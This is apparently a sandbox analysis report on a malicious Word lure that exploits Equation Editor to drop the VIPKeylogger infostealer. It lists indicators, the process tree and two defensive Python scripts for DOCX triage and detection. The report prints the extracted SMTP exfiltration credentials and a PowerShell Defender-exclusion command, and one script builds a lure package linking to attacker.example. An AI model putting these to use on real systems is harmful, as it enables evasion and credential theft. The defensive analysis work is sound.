Analysis
- Max time kernel: 120s
- Max time network: 134s
- Platform: windows7_x64
- Resource: win7-20240708-en
- Resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
- Submitted: 21/08/2024, 07:16
Static task: static1
Behavioral task: behavioral1
- Sample: ORDER CFC.docx
- Resource: win7-20240708-en
Behavioral task: behavioral2
- Sample: ORDER CFC.docx
- Resource: win10v2004-20240802-en
General
- Target: ORDER CFC.docx
- Size: 179KB
- MD5: 413ed50fc5b7fc796c710bb1b0f02cc4
- SHA1: 440c50be71fbe20648115bcd65b04a75940a833a
- SHA256: dcdd3c117ec0dc6af052496d1cc0d24da9b264f566e0e763380af879dfbcdf27
- SHA512: c47893f5b8cca2015ff4803d14dc8f04d857ee0478d62be8dd61f00d0e363de1c1c05b16cde5afe9d0ed0a2df58fada5deda7b728f65f2b20764df430f787d99
- SSDEEP: 3072:AiY5rj1ATug+mhTZMxjcFQ9csn4qAzYjDp/shKuikycBSRjR/Vx7XUo4Zj:a5r/g+qZMpcFSQzYHut4dNAj
Malware Config
Extracted: vipkeylogger
- Protocol: smtp
- Host: mail.mangroveservices.net
- Port: 587
- Username: [email protected]
- Password: ?hMoSL*2jz
- Email To: [email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C#; it closely resembles SnakeKeylogger, which was first observed in 2020.
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious access to, or copying of, a web browser credential store.
-
Blocklisted process makes network request 1 IoCs
flow | pid | Process
7 | 2176 | EQNEDT32.EXE
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, or processes.
pid | Process
528 | powershell.exe
Downloads MZ/PE file
-
Abuses OpenXML format to download file from external location
-
Executes dropped EXE 2 IoCs
pid | Process
1108 | erdalpha03977.exe
1984 | erdalpha03977.exe
Loads dropped DLL 1 IoCs
pid | Process
2176 | EQNEDT32.EXE
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk, where infostealers often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies and autofill entries.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | erdalpha03977.exe
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | erdalpha03977.exe
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | erdalpha03977.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
8 | checkip.dyndns.org
Drops file in System32 directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 1108 set thread context of 1984 | 1108 | erdalpha03977.exe | 37
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the victim system's language in order to infer the host's geographical location.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WINWORD.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | EQNEDT32.EXE
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | erdalpha03977.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | erdalpha03977.exe
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid | Process
2176 | EQNEDT32.EXE
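The "Abuses OpenXML format to download file from external location" and "Launches Equation Editor" signatures above describe properties of the document package itself, so both can be checked before the file is ever opened. A .docx is a ZIP of XML parts; a part's _rels file may declare a Relationship with TargetMode="External", in which case Word fetches the target from the URL it names (the 820KB lOpkseAloegPhxxAcv[1].doc under Content.IE5 in the Downloads list below is consistent with such a fetch), and an <o:OLEObject> whose ProgID is Equation.3 makes Word hand that content to EQNEDT32.EXE, the component CVE-2017-11882 lives in. The script below is an added example, not the sandbox's code and not this sample's XML (the report does not include it): the package it builds is a constructed stand-in, with a made-up URL http://attacker.example/lure.doc and made-up relationship IDs, and the checks are generic, listing every external relationship (oleObject, attachedTemplate and frame are the remote-capable types) and every OLE ProgID so a DOCX can be triaged offline.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
OLE_NS = "urn:schemas-microsoft-com:office:office"

# Relationship types through which a document can pull content from outside the package.
REMOTE_CAPABLE = {
    f"{R_NS}/oleObject": "oleObject",
    f"{R_NS}/attachedTemplate": "attachedTemplate",
    f"{R_NS}/frame": "frame",
}


def inspect_docx(data: bytes) -> Dict[str, list]:
    """Collect external relationships and OLE object ProgIDs from an OOXML package."""
    findings: Dict[str, list] = {"external": [], "ole": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.endswith(".rels"):
                # Every *.rels part can carry an External target, not just document.xml.rels.
                for rel in ET.fromstring(zf.read(name)).iter(f"{{{RELS_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        rtype = rel.get("Type", "")
                        findings["external"].append({
                            "part": name, "id": rel.get("Id"),
                            "type": REMOTE_CAPABLE.get(rtype, rtype),
                            "target": rel.get("Target"),
                        })
            elif name.startswith("word/") and name.endswith(".xml"):
                # OLE objects are declared in the WordprocessingML parts; ProgID selects the server.
                for ole in ET.fromstring(zf.read(name)).iter(f"{{{OLE_NS}}}OLEObject"):
                    findings["ole"].append({
                        "part": name, "progid": ole.get("ProgID"),
                        "mode": ole.get("Type"), "rid": ole.get(f"{{{R_NS}}}id"),
                    })
    return findings


def triage(findings: Dict[str, list]) -> List[str]:
    """Reasons to treat the document as hostile; an empty list means nothing was found."""
    reasons = []
    for rel in findings["external"]:
        if rel["type"] in REMOTE_CAPABLE.values():
            reasons.append(f'{rel["part"]}: external {rel["type"]} {rel["id"]} -> {rel["target"]}')
    for ole in findings["ole"]:
        if (ole["progid"] or "").startswith("Equation"):
            reasons.append(f'{ole["part"]}: OLEObject ProgID={ole["progid"]} Type={ole["mode"]} r:id={ole["rid"]}')
    return reasons


def build_sample_docx(remote: bool = True) -> bytes:
    """Constructed test package (not the real sample). With remote=True it carries an
    external oleObject relationship to a made-up URL and an Equation.3 OLE link using it."""
    rels = [f'<Relationship Id="rId1" Type="{R_NS}/styles" Target="styles.xml"/>']
    body = "<w:p><w:r><w:t>Order CFC</w:t></w:r></w:p>"
    if remote:
        rels.append(f'<Relationship Id="rId2" Type="{R_NS}/oleObject" '
                    f'Target="http://attacker.example/lure.doc" TargetMode="External"/>')
        body += ('<w:p><w:r><w:object><o:OLEObject Type="Link" ProgID="Equation.3" '
                 'ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1" '
                 'r:id="rId2" UpdateMode="Always"/></w:object></w:r></w:p>')
    document = (f'<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                f'xmlns:o="{OLE_NS}" xmlns:r="{R_NS}"><w:body>{body}</w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", f'<Relationships xmlns="{RELS_NS}"><Relationship Id="rId1" '
                    f'Type="{R_NS}/officeDocument" Target="word/document.xml"/></Relationships>')
        zf.writestr("word/document.xml", document)
        zf.writestr("word/styles.xml",
                    '<w:styles xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        zf.writestr("word/_rels/document.xml.rels",
                    f'<Relationships xmlns="{RELS_NS}">{"".join(rels)}</Relationships>')
    return buf.getvalue()


if __name__ == "__main__":
    for line in triage(inspect_docx(build_sample_docx())):
        print(line)
```

To run it against a real file, pass the bytes of the .docx to inspect_docx() and read triage(); any External target under an oleObject, attachedTemplate or frame relationship, or any Equation ProgID, is reason enough to detonate the document in a sandbox rather than open it.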
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid | Process
2700 | WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid | Process
1984 | erdalpha03977.exe
528 | powershell.exe
1984 | erdalpha03977.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs
Token | pid | Process
SeDebugPrivilege | 1984 | erdalpha03977.exe
SeDebugPrivilege | 528 | powershell.exe
SeShutdownPrivilege | 2700 | WINWORD.EXE
Suspicious use of SetWindowsHookEx 2 IoCs
pid | Process
2700 | WINWORD.EXE
2700 | WINWORD.EXE
Suspicious use of WriteProcessMemory 21 IoCs
description | pid | Process | procid_target | events
PID 2176 wrote to memory of 1108 | 2176 | EQNEDT32.EXE | 32 | 4
PID 2700 wrote to memory of 2352 | 2700 | WINWORD.EXE | 35 | 4
PID 1108 wrote to memory of 528 | 1108 | erdalpha03977.exe | 36 | 4
PID 1108 wrote to memory of 1984 | 1108 | erdalpha03977.exe | 37 | 9
outlook_office_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | erdalpha03977.exe
outlook_win_path 1 IoCs
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | erdalpha03977.exe
Processes
- C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2700)
  Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER CFC.docx"
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - C:\Windows\splwow64.exe (PID 2352)
    Command line: C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE (PID 2176)
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\erdalpha03977.exe (PID 1108)
    Command line: "C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 528)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"
      - Command and Scripting Interpreter: PowerShell
      - Drops file in System32 directory
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Roaming\erdalpha03977.exe (PID 1984)
      Command line: "C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"
      - Executes dropped EXE
      - Accesses Microsoft Outlook profiles
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - outlook_office_path
      - outlook_win_path
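The process tree above is the whole chain in six process-creation events, and each hop is a detection on its own: EQNEDT32.EXE spawning anything (Equation Editor has no legitimate children), PowerShell adding a Defender exclusion for the dropped file, the dropped binary relaunching itself from %AppData%\Roaming (the SetThreadContext and WriteProcessMemory events from PID 1108 into PID 1984 are the hollowing that follows), Equation Editor itself opening a network flow, and the final payload resolving its external IP through checkip.dyndns.org. The following is an added example and not part of this report: a small rule set over Sysmon-style process and network events, fed with events reconstructed from this tree and the flow table. The parent of the two tree roots is not shown in the report (ppid 0 below), the process behind flow 8 is not stated and is assumed here to be PID 1984, and the rule names and ATT&CK technique numbers are the author's.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    pid: int
    ppid: int        # 0 = parent not shown in the report
    image: str
    cmdline: str


@dataclass
class NetFlow:
    flow_id: int
    pid: int
    host: str        # "" when the report gives only the flow id


# Office front-ends whose children in a user-writable directory are suspect.
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Office components that have no business opening a socket at all.
NO_NETWORK_IMAGES = {"eqnedt32.exe"}
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "api.ipify.org", "icanhazip.com", "ifconfig.me"}
EXCLUSION_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-(?:ExclusionPath|ExclusionProcess|ExclusionExtension|DisableRealtimeMonitoring)",
    re.IGNORECASE)
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\(?:Roaming|Local)\\", re.IGNORECASE)

Alert = Tuple[int, str, str]   # (pid, rule, detail)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent], flows: List[NetFlow] = ()) -> List[Alert]:
    by_pid = {e.pid: e for e in events}
    alerts: List[Alert] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        img = basename(e.image)
        # T1203: Equation Editor should never have children.
        if pimg == "eqnedt32.exe":
            alerts.append((e.pid, "equation_editor_child", f"EQNEDT32.EXE (pid {parent.pid}) spawned {img}"))
        # Office application launching an executable that lives under %AppData%.
        if pimg in OFFICE_IMAGES and USER_WRITABLE_RE.search(e.image):
            alerts.append((e.pid, "office_spawns_appdata_exe", f"{pimg} spawned {e.image}"))
        # T1562.001 via T1059.001: Defender exclusion or real-time monitoring change from PowerShell.
        if img in {"powershell.exe", "pwsh.exe"} and EXCLUSION_RE.search(e.cmdline):
            alerts.append((e.pid, "defender_exclusion", e.cmdline))
        # Same image relaunched as its own child from %AppData%: the usual precursor to
        # SetThreadContext-based hollowing (T1055.012). Confirm with the SetThreadContext
        # and WriteProcessMemory events against the child, not with this alert alone.
        if parent and pimg == img and USER_WRITABLE_RE.search(e.image):
            alerts.append((e.pid, "self_relaunch_from_appdata", f"{img} pid {parent.pid} -> pid {e.pid}"))
    for f in flows:
        img = basename(by_pid[f.pid].image) if f.pid in by_pid else ""
        if img in NO_NETWORK_IMAGES:
            alerts.append((f.pid, "blocklisted_process_network", f"flow {f.flow_id} from {img}"))
        if f.host.lower() in IP_LOOKUP_HOSTS:
            alerts.append((f.pid, "external_ip_lookup", f"flow {f.flow_id} to {f.host}"))
    return alerts


# Events reconstructed from the process tree and flow table of this report (constructed
# input). ppid 0 marks roots whose parent the report does not show; the pid behind flow 8
# is not stated in the report and is assumed to be 1984.
SAMPLE_EVENTS = [
    ProcEvent(2700, 0, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER CFC.docx"'),
    ProcEvent(2352, 2700, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    ProcEvent(2176, 0, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              r'"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding'),
    ProcEvent(1108, 2176, r"C:\Users\Admin\AppData\Roaming\erdalpha03977.exe",
              r'"C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"'),
    ProcEvent(528, 1108, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"'),
    ProcEvent(1984, 1108, r"C:\Users\Admin\AppData\Roaming\erdalpha03977.exe",
              r'"C:\Users\Admin\AppData\Roaming\erdalpha03977.exe"'),
]
SAMPLE_FLOWS = [NetFlow(7, 2176, ""), NetFlow(8, 1984, "checkip.dyndns.org")]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS, SAMPLE_FLOWS):
        print(f"[{rule}] pid {pid}: {detail}")
```

Run as written it raises five alerts on the reconstructed chain (PIDs 1108, 528, 1984 and the two flows); the Add-MpPreference rule is the one worth deploying first, since a Defender exclusion written by a child of an Office process has no benign explanation, while the self-relaunch rule should be joined with the SetThreadContext event before it pages anyone.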
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
  - PowerShell (1)
- Exploitation for Client Execution (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Unsecured Credentials (2)
  - Credentials In Files (2)
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{1801A583-5FA4-43A0-9846-ED567702CEF2}.FSD
  Filesize: 128KB
  MD5: 1fcf6ba39d294835197b61f89985cc19
  SHA1: 8bab32a1f09d4cacddf858bc5e935a76db5773e1
  SHA256: 5461b8f01c5d92d7fb36300dfe2e34de89f43f935649b08b168de874a502fcbd
  SHA512: f305f3c4032d206ff4c7a5a546e03edf1a7659b6462cd5ae71d02f117f943d3c4e34a6e022bbe04e6925229dd11ef7181f4c89bfdbb46e8a4d9f905ad45d18ac
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
  Filesize: 128KB
  MD5: db1a4477e0b4f604320eca76485dd8a4
  SHA1: 2099758d2ca0ca60b98d473ac8484d9b65cc83fd
  SHA256: 79270048b8d5e61b20a5f55f49aa5662ba98f25fbad25259c01d7bfb7437468e
  SHA512: ef6d6e14ae50327875c177830616cb1bc4aa83e6fb8ff6dedc1bbbe5ba7d7fc58de9c75f13f845cb44a53e5cf271b6c846e0db51346c9e892bdde46d0054043a
- C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{4FE33FBD-CE63-4C22-998F-B1175D2E54D0}.FSD
  Filesize: 128KB
  MD5: e2fa37573389e12121abf95dcf30e0dc
  SHA1: a00dd848288776e6afa8280cbdbf6b26948013b4
  SHA256: a568bfa45a225fa4c1a706390bbd076ddbbb94fcc5bdb5a7a1d10515ba43ba7b
  SHA512: ff124271f67ccd683d618dbea70b8895f798a69838bf792bed34f8a13670b4e84771ddc93ca5ea4e400aa4d8eb0aef23152a9de72677bc027c260bb3a0a716fa
- C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6XUZ2JLF\lOpkseAloegPhxxAcv[1].doc
  Filesize: 820KB
  MD5: 77d04e68c46c843c399d83b858b9b46a
  SHA1: 8f4f41f26cd7bd6b60045cc878c83d132f79193a
  SHA256: d718eb322dc9348cb1813a920ca739a5c4bd6b44ac32c0c085bd92148bf94161
  SHA512: 22986daa2bd352305885276d9c000caf89c171a6187caadb1d29bbbf1e89916e4a6a199aa6500890befaa9dfc92a14d87976b470b41ec49f5f050b40f9b8b81d
- (path not recorded)
  Filesize: 128KB
  MD5: 1efc6f87b9d9905a7473cf88a5fa8b78
  SHA1: 22b3a7bfa6a21edeec1d09d3f612890c9b4c8b6a
  SHA256: ac45f6eb2f26592f06156611612283910a5112e329f5b927a02545dd6d33e82b
  SHA512: 1485cb5d606d2be5332689dc7958f610b96dde1cb74561e01d2fe15ef8ccb30dbcedb66e9602777ced0a98c3a471a5cec4fa1029baf89cfc0acceea0f15406bf
- (path not recorded)
  Filesize: 128KB
  MD5: 6e8804585732974ade9bf90548f5bcec
  SHA1: ccaa7a6d00b2b1c8ae90ec14c7e5cf2b4c74149e
  SHA256: 78e957f012dd9e284cd40e0cdeeb6057b3303500a6ba0ae333e6754b02d7bbcd
  SHA512: 743b8c906371927b0f0a991ed91c098fcbe66c60a7fe139f622e17f95f9b6098dbdc37fab2e80b5ed85e38a5beec2b577364271ab1a8ea991ed3aad93ab36696
- (path not recorded)
  Filesize: 19KB
  MD5: 1b78260741a4818a9970e77e2187f33f
  SHA1: 5f6771cdfb33a9860e3032bb8038415c75600711
  SHA256: 99e6b00b7416bb9e83f48f19b9fed2ee1d46a8f3d538eb953cd900809549bf5f
  SHA512: 7ee24529e6b84473c929bf902f0e8cacb54f0c80bc55aa4125827351e8c0b90d7319b16c5351c26ffdec46fa8ebe49e27762f8a910187cba5c30b6c23f7412b4
- (path not recorded)
  Filesize: 2B
  MD5: f3b25701fe362ec84616a93a45ce9998
  SHA1: d62636d8caec13f04e28442a0a6fa1afeb024bbb
  SHA256: b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
  SHA512: 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
- (path not recorded)
  Filesize: 720KB
  MD5: 8457be7f4b6910dc68805dacb8009200
  SHA1: a25c63862fe75623c6e69659ee7ae803ec8659b9
  SHA256: 496ba3f23ddaf5c1514228f1ca90b1de4392a159eaac3ecbd5fbe3fbb28f819f
  SHA512: 6ec632c69a19e1d36371aff5664f3c7c266bfab2fa2b321c3db2bb2e47c42fc9f0c60ebb71b7d3087d54b270368efee0a869888a325aa3d3c8af482f16b482b0